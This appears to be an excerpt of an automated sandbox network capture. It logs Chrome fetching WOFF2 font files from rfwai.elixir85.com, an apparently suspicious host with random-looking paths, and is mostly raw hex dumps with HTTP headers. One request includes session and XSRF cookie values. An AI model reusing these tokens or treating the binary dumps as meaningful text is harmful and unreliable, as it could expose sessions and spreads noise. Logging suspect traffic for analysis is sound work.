                                                        Content-Disposition: inline; filename="89U0IUXkEak2DXQHKMqxZiF121VeznpNcbYfab72"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsXlb%2FQSKOaauQ4WA0XU2nclbeNmFo9Pc4ZW%2BHvBH%2FkKBj4ZrCqa74kDFKB9Ddefk694w8GsNZ7hsh%2BW%2F8oDrD%2F%2F8BLD6l1PmiZPdl8SOqU%2FELQRvt02QedlmNC42A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92875de651861-EWR
                                                        2024-07-03 19:07:22 UTC724INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
                                                        Data Ascii: wOF2LPUz?HVAR;?MVARF`?STATH/L@P>06$x .{[qRlt~v(Tt;n'v=?l]xIm"?hNX,8;Gm,}h>(=[m/>8&f&]u&VD]<yRe
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 0d 27 22 bc 78 5a 0f b7 3d 62 5e e9 ec bf 1e 69 44 96 e1 11 7d 20 8c 8e 20 be ec 62 a6 ec fc 7d 44 49 76 75 d1 71 04 88 0f d8 6b cb 96 34 d2 0c f7 cc 14 40 c0 10 ce d5 ff 50 2a b0 b0 6a dc ed 89 29 f7 ec 94 27 df 4c 97 eb 89 c9 c2 ae b3 dc b1 62 e0 85 52 51 6a 49 2a 49 9b b4 51 6b da 54 ae 6c fa 5f 77 4f 0f d0 92 24 cb 1f e8 08 21 63 cc 2e 25 cb 7b 80 95 5f 4e 90 02 45 40 fc 00 0d 92 41 b0 da 9d f9 3f 9c ee 9a d9 61 57 0b 79 99 67 66 9d 67 1b 26 45 bc 0c f7 20 7e 88 78 f0 62 c5 cc 83 05 b5 62 c1 82 85 7e f8 a7 d6 f4 ef 1e 66 2f 80 a8 0a 1e d0 47 8a 82 b3 9d 4a 1b 36 b2 79 fe b3 df fa 0e 7a 45 40 54 9c 61 aa 30 5e 55 6c f6 df cf 06 00 fc 53 3a c3 bf 92 2c 03 9e 7d 04 1b 42 ec 52 a7 a8 52 74 7e b7 76 d1 85 00 ba 4c 3a 60 34 c1 49 4b 41 1c e6 bd a7 56 a3 ca
                                                        Data Ascii: '"xZ=b^iD} b}DIvuqk4@P*j)'LbRQjI*IQkTl_wO$!c.%{_NE@A?aWygfg&E ~xbb~f/GJ6yzE@Ta0^UlS:,}BRRt~vL:`4IKAV
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 1f e6 4f f3 74 a7 db f2 6c 99 b1 ee b6 3e d8 2e 6d d7 b6 39 fb 46 fb 99 7d 9e 5d 57 72 91 73 73 4b bc 1c 72 12 ba 1e 36 36 7c 33 22 22 2a 2a 26 26 21 c1 e1 10 c5 bc bc 32 65 90 3a 76 de b1 83 76 d7 75 c7 d1 ff bd fa ef 37 7f f3 ee 97 3e fc ec d3 2f 3e 0d 7f 59 f7 9d e0 41 40 40 00 c8 82 05 10 40 c9 06 6a 8b 76 3f a2 63 04 fc cf bf 1a e0 05 82 e1 03 a0 ae 09 a0 0b f4 c0 a3 aa 1c 80 71 5b ad cd 01 38 80 ba 26 50 ed 76 16 e9 84 82 9d 77 d3 ef ac 8c 5b 06 e0 52 8b 81 00 1e 2c a6 f3 af 20 bc 4c 15 e0 d4 43 23 d6 51 35 b8 91 3c 4e 8d af 4d f0 9a f0 ff 89 98 49 1e c3 96 a1 ef 1e ef ae 41 39 d4 0e be a1 72 98 1c b4 98 29 ef a4 9e 40 7d 80 28 93 fa a9 ef 70 df d3 54 b5 e2 d5 ba 81 b2 f7 81 f6 10 fa 79 c4 7a c4 26 c4 11 70 a2 46 71 8f 62 7e 37 d0 ca bd 8a d4 e0 c1
                                                        Data Ascii: Otl>.m9F}]WrssKr66|3""**&&!2e:vvu7>/>YA@@@jv?cq[8&Pvw[R, LC#Q5<NMIA9r)@}(pTyz&pFqb~7
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 06 41 38 10 e1 cc a9 19 64 33 3f 2a 25 ab 11 e4 13 01 e9 44 ae 3d cb 5b 69 7e db 22 51 70 ef 63 32 39 e9 64 71 a7 b5 30 b6 01 15 1a 29 e2 db ce 53 01 4b 24 89 db 11 9c 91 10 7d 9c ef d5 0f e1 38 11 2a 9e 08 b1 c6 95 68 36 08 c4 a8 a2 b4 98 b5 21 8e 45 d0 71 24 18 a7 83 42 25 37 a3 0f 52 82 02 89 71 3b a6 33 e3 76 a8 96 c5 96 00 31 78 04 a8 30 14 19 d5 19 35 da 35 a1 cc 49 64 7a 77 af a4 2d 6a 48 d5 f9 10 15 85 2c 13 a3 9e f6 44 fc 18 de 56 cd 85 7c a5 47 ac 97 c9 a3 b9 57 e1 c4 0a 96 52 70 14 1b 9d cf 6b 27 9f a5 fa bd 08 79 02 2c 96 02 20 16 9d 4d 88 68 fb d6 4a 21 21 6d b6 8c 58 80 8a 4a bd a3 a3 79 25 a6 aa 2e 1a 3d c6 77 60 74 91 90 6a 2a 81 e2 98 32 ad 42 a4 cf 75 c9 16 1c 25 3d 79 6f 32 9f 8e cf 45 7e e6 05 e8 4e 24 f2 4f 2c 8e ab 2d 9c 9c 76 49 bb
                                                        Data Ascii: A8d3?*%D=[i~"Qpc29dq0)SK$}8*h6!Eq$B%7Rq;3v1x055Idzw-jH,DV|GWRpk'y, MhJ!!mXJy%.=w`tj*2Bu%=yo2E~N$O,-vI
                                                        2024-07-03 19:07:22 UTC1369INData Raw: ea b8 d2 5a 1e 85 94 34 75 e8 49 d3 5e 26 60 bf a5 86 5b 4a 69 0c d1 e1 b8 20 fc 23 8b 97 28 3f 36 3d bc 0d d8 3d 52 72 fe 9d 98 df f6 99 86 c4 bc 22 f8 09 5a 28 e5 b7 77 89 61 b7 36 f9 53 75 68 4b 1e a3 d9 26 75 d4 2c cc 9b ab c9 a0 c4 be a0 65 70 6a fc 71 23 f4 aa f8 fc 97 90 31 c6 86 3b 8d 2e bf 22 ac c8 63 a8 a4 64 cd 76 00 e5 20 65 ff cf 30 3f a6 13 d2 e5 62 0b a4 27 2d 7d 39 cc f0 e0 9e 1d af b5 ec 6f 86 84 31 96 bb 8e 91 1f de f5 79 ed 91 b4 46 3e b6 fa d8 67 65 be e3 e4 c7 96 8c a1 bb 91 79 70 21 64 5b 43 4a bb 5f ce 7f 6a 9e e2 6c 74 bd 98 84 44 03 65 56 43 e1 02 9a f1 01 c9 b2 0e 5a 9a 74 1e 19 d7 2d 04 6b 89 4f 3e 7f eb 62 e6 73 66 69 2d cd a3 e6 3f 27 75 aa 1d f4 11 10 73 fc 42 d2 5a c5 86 43 23 db 5e 68 e7 7a 4b d7 dd 63 72 dd 6d 59 de 57 ba
                                                        Data Ascii: Z4uI^&`[Ji #(?6==Rr"Z(wa6SuhK&u,epjq#1;."cdv e0?b'-}9o1yF>geyp!d[CJ_jltDeVCZt-kO>bsfi-?'usBZC#^hzKcrmYW
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 2d 1b e1 de 58 7f 4c 93 b6 dc c8 6b a3 ce 59 5f c3 25 0b 9d f2 4a e9 03 fe a9 a9 bb 81 48 18 fa 58 6c d7 68 8e c9 73 ff 93 f3 ea 71 72 7c d4 67 35 e2 25 58 ad 9b 53 bb 0e 1a 84 1a b8 82 5e 74 f8 f1 ff 58 67 54 9d 62 90 e9 68 f1 c4 58 64 f4 a7 11 7b 4a 5a 49 91 3e 4e c4 a0 f3 c2 16 05 ca 58 f5 2f 67 94 92 df bd d2 cb da 8d 4e 2f c9 b6 83 3e 5b 35 3d f8 fc e3 65 9c 37 d6 d2 a2 c6 49 f6 ae d8 e1 89 37 ae 63 7d 3f 6f 70 d7 3f 3b 22 5b 75 e5 01 5e 3b bd 02 7a e2 ad bd 31 24 3b ab 34 eb 3d 4b b2 d1 8a eb d4 09 e1 09 bc 2e 7f c6 88 31 51 e6 fa 1c 6a c5 06 7d 66 4a f0 e0 eb c6 48 eb a6 3e de c9 7a 7d 78 4b d7 98 bd e2 c3 08 cd f3 88 6d ff fa 2e f6 41 89 df d6 d2 4a ff 7b f6 01 aa 12 65 af e8 2b 9c 2a 6b b9 21 bb 8c e8 e3 a7 1f ef 6f bf d7 f8 0b 47 b0 c3 71 a6 2e
                                                        Data Ascii: -XLkY_%JHXlhsqr|g5%XS^tXgTbhXd{JZI>NX/gN/>[5=e7I7c}?op?;"[u^;z1$;4=K.1Qj}fJH>z}xKm.AJ{e+*k!oGq.
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 0a 96 ec a7 d5 45 4c 1e ba 59 30 8f 71 e0 45 cd 17 36 9d d7 1b 32 2a 11 0d 58 a9 2e 71 1b 1f 61 c5 f5 94 ef d3 73 ea 88 7e fb b9 e6 e1 b6 70 c5 34 0a fa 3b 86 fc cc ba 3c 05 7c 34 ea 88 f5 a3 a2 c0 20 35 13 6c 15 e6 41 b8 3e b6 11 22 ac 69 58 6e 3e 6f 9f 28 7b a8 5f 8d bd 76 d8 eb 29 93 79 48 c9 a3 99 6f 6d 06 7f 5d 9e f1 6c 7c 55 3b 55 c9 af 3f cf 18 45 2c 1f 72 44 e3 8e 81 85 63 86 d5 6b ad b7 62 ee 7b 30 a5 df b6 73 24 1a c7 c1 b3 0d fe d9 73 ef 8f c3 b0 9d 51 f5 d7 70 ba 54 f4 24 dd 1a 73 5e 9d 9c 39 5d 1e 8c 82 fe 2c 1f ac a6 0c ba fc c5 27 14 94 19 0f 5f 43 a0 42 02 67 1f be 85 af e9 f8 fc a5 c4 0d b4 f6 ff a2 a2 95 1c ec dd 96 1c e3 1d 16 52 27 61 e2 78 29 ad 1d 7e c2 7e d3 02 91 a1 b6 1e d4 a0 32 62 5d 05 eb 60 2f a3 ce 28 2a e3 76 d1 e6 94 8a 9e
                                                        Data Ascii: ELY0qE62*X.qas~p4;<|4 5lA>"iXn>o({_v)yHom]l|U;U?E,rDckb{0s$sQpT$s^9],'_CBgR'ax)~~2b]`/(*v
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 98 fa f9 89 93 e2 ee 78 43 e1 f8 8c 32 f2 52 b9 28 d4 a6 32 9a 40 88 66 46 b8 5f 12 ff ff f1 87 04 f0 10 a2 2a 99 3a 19 38 85 1e 76 b6 ca 97 a4 50 a1 74 c5 4a 64 28 d7 28 4b 8b 76 a5 ba f4 a8 34 64 58 ad 57 5e a9 37 61 5a 83 05 0b b0 56 ec 6a b1 ef 8d 6e 47 be ea 77 69 c1 73 7e 5b 36 e1 26 c8 81 08 6c e7 58 14 76 72 2e 2a 52 87 d1 0a 77 14 a7 68 9f bb 2f d5 97 1e 6b e9 a2 36 6d fd ae 5d 6f 7f 1a b0 82 9f bb 29 b7 d4 fd 91 ac f6 10 55 d6 d9 81 2f c0 08 b1 30 af 61 14 e9 1d cc 52 bc 9b 4d aa f7 6a 94 66 cc 30 31 cf 58 e7 eb 7d 07 9e e7 07 f4 ff dd 72 11 79 f7 17 5f 34 4c 30 6f 52 00 13 2c 5d 6a a1 96 01 ec 65 65 8c c9 a0 60 fb 80 e3 33 a2 57 29 00 94 cf 1c 2c af 0c ea d6 9e 38 04 86 2f cf 6a 38 67 ad fd e2 eb f5 49 f1 24 1f c0 fb 3c e2 91 ad 41 0a dd d8 dc
                                                        Data Ascii: xC2R(2@fF_*:8vPtJd((Kv4dXW^7aZVjnGwis~[6&lXvr.*Rwh/k6m]o)U/0aRMjf01X}ry_4L0oR,]jee`3W),8/j8gI$<A
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 76 d8 69 17 89 4a a3 f3 33 98 2c 41 21 b6 b0 88 47 91 d7 a4 a8 59 49 85 cd e8 3b 74 ea d2 ad 47 af 01 83 2a 50 d0 30 b0 86 e7 e1 2b 22 33 b7 92 8a 9a 86 56 b1 9b 6b ab d7 c0 f1 42 d4 c9 4c 7c 57 eb 35 6a d6 a2 4d 87 17 ba 74 eb d5 6f f0 25 a9 7f fd e7 cc 5b b0 68 c9 b2 15 ab d6 ac db b4 65 db 8e 5d 7b f6 1f 5c 46 ee 05 c1 f8 3a a8 e2 f4 ae 1d 96 85 be 31 95 e5 ba 29 b3 5a 43 66 ac 5d ff 03 0f b1 75 01 fc b2 4f 81 3a f6 64 4f 47 bb 09 e2 3c 29 42 ad e2 3e 22 4d c4 96 88 6b 74 7e fd 64 e0 75 81 12 2b 3a af dd 10 60 9b 79 6f a0 89 16 44 eb 3a 5f 22 ef c0 43 4c be cd 4a 39 0e c7 e5 59 da 0b 4e c2 cb e5 0c c1 50 23 94 b7 f3 4e de 25 4a c6 14 ad b2 60 08 6e 56 39 dc aa d3 6a 2d 0f 41 b9 5a df dc ee da de da be da fe 15 9d 13 bc 46 63 60 98 0d 8b 15 9c 87 cd 92
                                                        Data Ascii: viJ3,A!GYI;tG*P0+"3VkBL|W5jMto%[he]{\F:1)ZCf]uO:dOG<)B>"Mkt~du+:`yoD:_"CLJ9YNP#N%J`nV9j-AZFc`
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 37 07 82 82 03 f3 57 85 84 d4 2b 00 1c 18 0f 5d 54 95 c8 98 28 93 32 63 a4 7d 4c 7f a8 5d 3c fc e6 0b 52 65 a8 96 ad 58 0e 9c 5d eb b6 6c 47 61 61 c3 76 2e 25 66 40 87 ee 2b 77 72 0b b9 36 71 8f ab 5f 1d 5b f5 cc bb 91 f0 45 30 3e 81 94 2f a3 d2 8e 56 37 3a 3d a8 75 61 30 8d d1 0c 4e 07 58 6c 60 b7 83 db 11 56 9b 78 3d f6 4d 93 ef f2 ae 35 07 29 06 c0 76 69 21 92 12 8b a1 27 35 49 2b 44 12 93 cf 48 71 b0 40 ca 43 53 1d 9e ca b0 90 23 52 1b 9b e6 94 b4 a7 a7 35 4d 21 2e 87 4c c3 aa 9a 97 c9 d2 f4 17 66 95 1f bf 28 5e 61 c2 ca 24 35 89 ab 13 55 a5 5c 9f 62 5d f2 f6 6c 6f 17 b8 23 ef de 82 df 2a 60 7b 41 6f 16 f1 7e 31 ad 15 2b a1 9d 92 db 2f b1 dd 08 f8 24 f1 58 b6 cd cf a7 2f 72 be 06 8f cf 43 45 27 ad 4d b5 a1 b3 3a 34 5b ca 51 91 0f 59 c2 86 19 45 7e 58
                                                        Data Ascii: 7W+]T(2c}L]<ReX]lGaav.%f@+wr6q_[E0>/V7:=ua0NXl`Vx=M5)vi!'5I+DHq@CS#R5M!.Lf(^a$5U\b]lo#*`{Ao~1+/$X/rCE'M:4[QYE~X


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.549793104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:21 UTC1395OUTGET /efO4CTDXl0E5HViNkg78iFXDw85H8kkQKZmn98 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://rfwai.elixir85.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:22 UTC631INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:22 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 93276
                                                        Connection: close
                                                        Content-Disposition: inline; filename="efO4CTDXl0E5HViNkg78iFXDw85H8kkQKZmn98"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PMZ8Jz90LYKHjBaVgwCUC%2FfROJAwBcrvTYXSgpC8nlo3R30SEhF2v7vu4ljEAZRNI3O725YC63soh0ckVAiV9%2Bc1P6rQOBdXsr1W9Mt9Y1DF8J8MYebJucgo0u20iA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928764fe24246-EWR
                                                        2024-07-03 19:07:22 UTC738INData Raw: 77 4f 46 32 00 01 00 00 00 01 6c 5c 00 14 00 00 00 04 b2 20 00 01 6b e0 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a a4 76 1b 83 bb 26 1c 93 24 3f 48 56 41 52 a0 6a 3f 4d 56 41 52 81 46 06 60 3f 53 54 41 54 81 36 27 38 00 91 18 2f 81 48 11 08 0a 81 f8 0c 81 d3 78 0b 89 1a 00 30 8b e7 3a 01 36 02 24 03 92 30 04 20 05 97 7a 07 a2 17 5b 12 9a 94 07 25 22 db df 13 ba a5 ab c1 a5 a2 a8 fe 21 df bb 49 da 54 19 b0 7f a9 77 90 21 63 9b 48 1d ce cd 74 1d 5d 6b a5 08 9e a7 0f c8 36 9d f1 82 43 79 c3 a8 7f 55 6c b7 72 65 ff ff ff ff ff ff 9b 92 49 8c e9 25 e8 25 f9 7f 00 15 44 45 b1 a0 ba ce 76 d3 69 ae 51 46 38 dc dd 84 83 d2 69 48 19 21 72 0a ca e2 f4 da d1 50 34 5a 5b b9 db ae 1d f6 5a 73 10 9e 89 b6 6f 06 0e 72 ef e2 38 62 1c 4f e8
                                                        Data Ascii: wOF2l\ kv&$?HVARj?MVARF`?STAT6'8/Hx0:6$0 z[%"!ITw!cHt]k6CyUlreI%%DEviQF8iH!rP4Z[Zsor8bO
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 0f f1 f9 f3 34 67 bd 3f f3 47 f2 33 13 26 d3 99 30 4c 26 e9 24 85 40 52 36 bb a5 e2 88 55 8c 15 6f 9d dd 3a ed 9a 53 a7 3d 0a d4 1c b3 db 62 55 0b a1 75 ca 5d 7a ac 57 38 5b 55 18 7c 37 fb 27 fe 25 e6 f2 75 2e 9c 88 31 31 8e 19 67 3c c6 ba 5e c7 a0 eb fa 4a c9 da 50 42 1b 4a 48 42 02 11 f0 6b fa b3 0f 0e 89 0a 91 8a 5d c4 80 28 24 a5 0d 44 ae 16 ab 53 22 75 be b7 ce 37 e2 fc ab 39 9f 38 15 a3 ee d4 9c 1a 55 a3 e6 37 13 d4 a6 ed 52 24 04 df 78 a9 f9 ac 67 d0 58 9b 7a 56 81 2c a8 24 a5 19 ab 89 79 c6 3a 8e 8d 8a 88 86 51 24 4f 4d c7 b1 f6 b7 9f 71 cc e7 20 a3 88 08 28 df 96 4f e5 14 c4 00 22 12 64 3c 07 6c c8 ed 39 a9 fd 7c 5e 42 08 72 b6 35 8f d0 c3 f3 a7 fd cc b9 79 69 bb 44 99 0f b9 5f 84 16 09 3c 50 9b f9 6f 92 11 08 a9 28 52 65 ab 49 eb 90 c9 96 9a 40
                                                        Data Ascii: 4g?G3&0L&$@R6Uo:S=bUu]zW8[U|7'%u.11g<^JPBJHBk]($DS"u798U7R$xgXzV,$y:Q$OMq (O"d<l9|^Br5yiD_<Po(ReI@
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 0c 63 96 10 1c 40 42 44 dd f4 16 cf 30 00 2b fb 79 0b 30 ab c4 72 0d 2d 40 8d fe 19 13 b5 2f 74 e2 3e 24 50 23 ab dc 2a 66 4d 64 c4 fc ff 2f 53 ab 6d 24 50 26 09 49 5d 09 75 9d 3e c1 ea 31 1f d2 98 cf 56 cd 54 a8 74 6a 7f 21 1b e3 9c 0f 44 44 22 1d 29 45 26 48 55 24 92 52 07 92 54 55 20 21 75 7d 24 c8 3a 01 40 86 24 32 00 8a cd 24 e5 2d 59 9e 72 a6 cc 4b 24 d5 13 80 aa 7a 82 60 1b 94 34 ce 2d 67 b1 1c ca 96 d5 9c 33 32 e3 a4 1a e3 36 db 24 c7 b1 8d db a9 6a 45 cd 8a 9a 55 8a e3 a8 9a fd 86 aa 55 d5 ac d4 1a bf 33 7e d7 67 f8 e7 6d 4f ce f6 e5 66 e3 7f 46 56 c8 0a 61 36 e5 a3 4e 26 1e 46 a2 08 72 83 40 08 87 47 e1 7f 99 5a a6 68 7c 99 6e 6c d2 0f 2b 33 dc e8 4e 91 71 44 5d 90 6c 29 8d ba 7f af 41 f7 5b 43 0e ce 0d 46 16 90 e1 0e ce 11 23 c7 5d f9 38 5a 60
                                                        Data Ascii: c@BD0+y0r-@/t>$P#*fMd/Sm$P&I]u>1VTtj!DD")E&HU$RTU !u}$:@$2$-YrK$z`4-g326$jEUU3~gmOfFVa6N&Fr@GZh|nl+3NqD]l)A[CF#]8Z`
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 43 b4 b6 e2 5b 28 0a 7e 3f b8 60 01 41 a5 a2 9d 5f aa aa 92 e7 97 9e 00 03 7a 83 f2 df f4 f1 96 7c fe b4 e4 ea d5 9a f9 6c b0 ba 4a 10 6f b7 59 2c ed 74 74 e4 f7 a7 d3 2b 96 40 40 51 66 f5 e7 a0 33 8f 73 f2 d6 c3 e5 9d c3 71 fc 46 72 66 3c 24 2e ce 60 06 3a c8 29 d6 a8 8f 62 ff a8 a5 b5 cd eb 44 76 4b 25 94 fc d0 62 76 e3 42 5d fd 97 64 4c 8b a5 52 6f f8 db 8f 00 94 fc c8 46 5c bd 1c c3 40 2b d1 7a 43 c4 ad 17 b2 b7 ee 9b 4d 09 0d f9 6d 07 99 10 1d 47 e6 96 3a 20 3d bc 3a 0d 3e bf 95 84 ea 25 93 ae 69 08 6c df 80 35 2a 08 70 c7 de 92 9c 79 e0 1a 17 e6 d0 2b 30 1e 2f 83 0e c7 e9 73 30 77 e7 e6 02 22 bb d8 06 99 5b ee 22 53 80 20 c8 6e 2c 06 05 26 12 28 14 52 ba 16 12 3d a2 47 3f 10 f5 06 a5 24 4d 82 75 e6 ad 90 27 62 69 e9 36 4c 84 88 93 25 f6 f6 23 80 28
                                                        Data Ascii: C[(~?`A_z|lJoY,tt+@@Qf3sqFrf<$.`:)bDvK%bvB]dLRoF\@+zCMmG: =:>%il5*py+0/s0w"["S n,&(R=G?$Mu'bi6L%#(
                                                        2024-07-03 19:07:22 UTC1369INData Raw: e7 d6 9d 2d b4 a6 93 cf 99 1f a7 dd 6e 68 53 44 dd 65 65 89 d1 c0 a3 92 64 cc 31 18 63 26 13 31 4e cf 58 79 53 b2 2e db 9a 28 b6 9b 3c a6 00 5c 5e 11 8b 83 4b be 05 32 16 f2 27 f7 9c df b0 9c 1c 87 3a fa 62 03 4e 5f dc 30 32 d9 0e 2d 29 bb 39 86 5a ea 25 1c f9 80 80 d3 b0 59 47 03 e1 38 0e 99 e4 42 e4 67 ce e4 d4 da 88 c7 03 50 4c 29 22 8c 02 70 3a 8b 8a 3b 0f 04 48 26 b5 d1 e4 52 e7 01 3b 4a af d0 d3 a7 68 fe d1 72 c3 4a 60 ba 24 bf 8f 51 eb 11 25 b1 c6 4b 41 a6 d8 73 32 1b 16 4b c4 62 8e e3 36 ec 6e b3 cd 37 b4 0e 4b 95 68 ab 33 1a 0d ac 6a 2b cd a4 45 22 f2 62 82 62 42 1d c3 cc f9 59 5f 50 eb 07 b4 8a da 4d aa 17 47 d3 fa a5 80 8d 11 25 a5 a5 8e 5b 88 5c b9 82 21 5e 88 6c 18 63 03 d6 93 18 f3 cb 40 59 d9 d2 20 37 88 18 e8 62 0c ab b3 f8 99 33 4f d5 ea
                                                        Data Ascii: -nhSDeed1c&1NXyS.(<\^K2':bN_02-)9Z%YG8BgPL)"p:;H&R;JhrJ`$Q%KAs2Kb6n7Kh3j+E"bbBY_PMG%[\!^lc@Y 7b3O
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 82 2c b7 fc 55 50 9b 51 70 75 a8 cf 20 94 27 85 0a 16 c2 d5 50 55 97 db 1a cc e4 ea f8 bf 7f 82 9d cf b0 bf bf a8 d2 cf 05 72 5b e8 50 23 0f 23 4b 61 90 94 da f0 4d c9 51 9e 26 0a ec ec ab 69 b4 bd c3 2f 0a f0 74 03 f6 16 2e 59 39 12 0b bc 0c 0d 75 a9 8f 01 48 d7 04 85 96 d2 ab 02 9b de 6d db bd 90 bc 86 ef 83 5a 63 5b 32 e2 71 f8 6e c1 87 75 a9 ee 4c f7 99 27 02 3c 78 27 d8 98 de f7 56 7f 6e f1 fc aa 81 eb 24 c5 fb 60 e0 b0 f2 f0 af dd 25 60 5f 6c d7 6b c0 60 ea 09 fc a1 7e ef 21 d2 65 be 87 84 64 f1 c8 69 fa 9c 49 2f cf 79 79 88 42 e1 4d be 7d 02 60 bf 63 b8 ea ea 63 24 2b 5c 48 cf ca 79 d8 58 89 bd 6f 81 38 cf 87 07 47 13 25 b0 2d d0 2c 71 94 b6 07 95 04 aa e5 65 bc fd e1 eb 93 81 1b a5 d7 ee 19 35 2a 5a aa 17 d4 e1 0e 65 4b 21 2d a7 bf d7 25 e2 9e 22
                                                        Data Ascii: ,UPQpu 'PUr[P##KaMQ&i/t.Y9uHmZc[2qnuL'<x'Vn$`%`_lk`~!ediI/yyBM}`cc$+\HyXo8G%-,qe5*ZeK!-%"
                                                        2024-07-03 19:07:22 UTC1369INData Raw: 90 a7 8b 89 35 60 8b 3c b7 b7 76 cf d3 be da d0 82 50 1b dc 81 52 9f 2b 78 b5 85 1a db 2f 23 11 ee 7e 0f 9c d7 f5 b8 cb 06 d1 4f 79 55 8a 13 9b 6a a8 95 46 95 37 af 7b 7d 90 cb 24 1d 9e 26 31 5b 76 a7 8e 76 62 74 7b e0 dc a7 f1 6e 9f 45 d5 21 b2 23 85 2c cb e7 31 09 a3 7a 4c d0 45 20 b1 44 fe 05 66 c7 02 03 dc df d5 bb 25 f4 ec 02 f0 c1 23 0b fa 7f ae 9b 73 07 7b 16 f5 36 ec ec 00 db ec 7f d4 4b 78 3e 73 73 9f 0a ae ec e5 80 c4 cf 0a 3d 62 99 08 c1 b2 7d c7 70 b5 8c c7 69 52 40 79 3c 9f b9 99 d4 52 6e df 0a 35 b9 f0 ac 83 b5 6c 74 9e b8 70 fd 1d b6 ee 75 41 04 b5 ad 5c 10 e6 ad df 53 fe 59 1e 0a 54 02 09 f8 5e ab e5 8c c5 72 4c 47 c6 3b 62 55 95 51 f0 eb 4f 75 3e 57 a6 36 98 bc fe b1 bc ff 61 18 a2 79 e6 01 b9 02 66 9e 81 b8 b7 6b 51 78 30 95 72 f9 41 95
                                                        Data Ascii: 5`<vPR+x/#~OyUjF7{}$&1[vvbt{nE!#,1zLE Df%#s{6Kx>ss=b}piR@y<Rn5ltpuA\SYT^rLG;bUQOu>W6ayfkQx0rA
